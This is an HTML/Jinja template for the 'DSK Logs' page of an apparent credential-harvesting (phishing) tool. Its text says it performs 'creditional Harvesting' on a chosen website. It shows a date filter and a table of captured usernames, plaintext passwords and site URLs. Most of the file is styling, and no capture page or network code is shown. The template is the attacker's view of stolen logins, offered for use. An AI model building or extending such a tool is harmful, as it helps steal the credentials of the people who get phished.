<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>DSK</title>
    <style>
            p h1{
                color: white;
            }
            body
    {
        background: black;
        font-size: 18px;
    }
    .head
    {
        margin-top: 5%;
        margin-left: 10%;
        margin-right: 10%;
        background: white;
        padding: 25px;
        border-radius: 10px;
    }
    
    .form
    {
        margin: 25px;
    }
    input
    {
        margin: 20px;
        border: none;
        border-bottom: 3px solid black;
        font-size: 18px;
    }
    
    .submitbutton
    {
        margin: 20px;
        color: white;
        background: black;
        padding: 10px;
        padding-left: 20px;
        padding-right: 20px;
        font-size: 18px;
        border-radius: 5px;
        cursor: pointer;
    }
    
    button
    {
        padding: 10px;
        padding-left: 20px;
        padding-right: 20px;
        font-size: 18px;
        text-decoration: none;
        margin: 10px;
        color: white;
        background: black;
        padding: 8px;
        font-size: 18px;
        border-radius: 5px;
    }
    
    a
    {
    text-decoration: none;
    color: white;
    }
    
    hr
    {
        border: 2px solid black;
        border-radius: 5px;
    }
    
    table td,tr
    {
        font-size: 18px;
        padding: 20px;
        border: 3px solid black;
        border-radius: 5px;
    }
    
    table th
    {
        font-size: 26px;
        padding: 20px;
        border: 3px solid black;
        border-radius: 5px;
    }
    
    .navbuttons button
    {
        background: white;
        color: black;
        border: 2px solid white;
        cursor: pointer;
    }
    
    select , select option
    {
        font-size: 18px;
        text-decoration: none;
        margin: 20px;
        color: white;
        background: black;
        padding: 8px;
        font-size: 18px;
        border-radius: 5px;
    }
    
    input:focus
    {
        outline: none;
    }
    
    button:focus
    {
        outline: none;
    }
        </style>
    
</head>
<body>
    <div class="head">
            <center>
                    <h1>Welcome to DSK Logs</h1>
                    <p>You can perform creditional Harvesting using this application</p>
                    <p>Just put the name of the website you want harvest the creditionals</p>

                    <h3>Here you can see logs by date</h3>
 
                    
    <form action="/logs" method="post">
        <input type="date" name="date" id="date">
        <button type="submit">Submit</button>
    </form>
    {% if data %}
    <table>
        <tr>
            <th>Date</th>
            <th>Time</th>
            <th>Username</th>
            <th>Password</th>
            <th>Weburl</th>
        </tr>
            {% for i in data %}
            <tr>
                <td>{{i.date}}</td>
                <td>{{i.time}}</td>
                <td>{{i.username}}</td>
                <td>{{i.password}}</td>
                <td>{{i.weburl}}</td>
            </tr>
            {% endfor %}
    </table>
    {% else %}
    <h3>There are no logs on this Date</h3>
    {% endif %}
</center>
</div>
</body>
</html>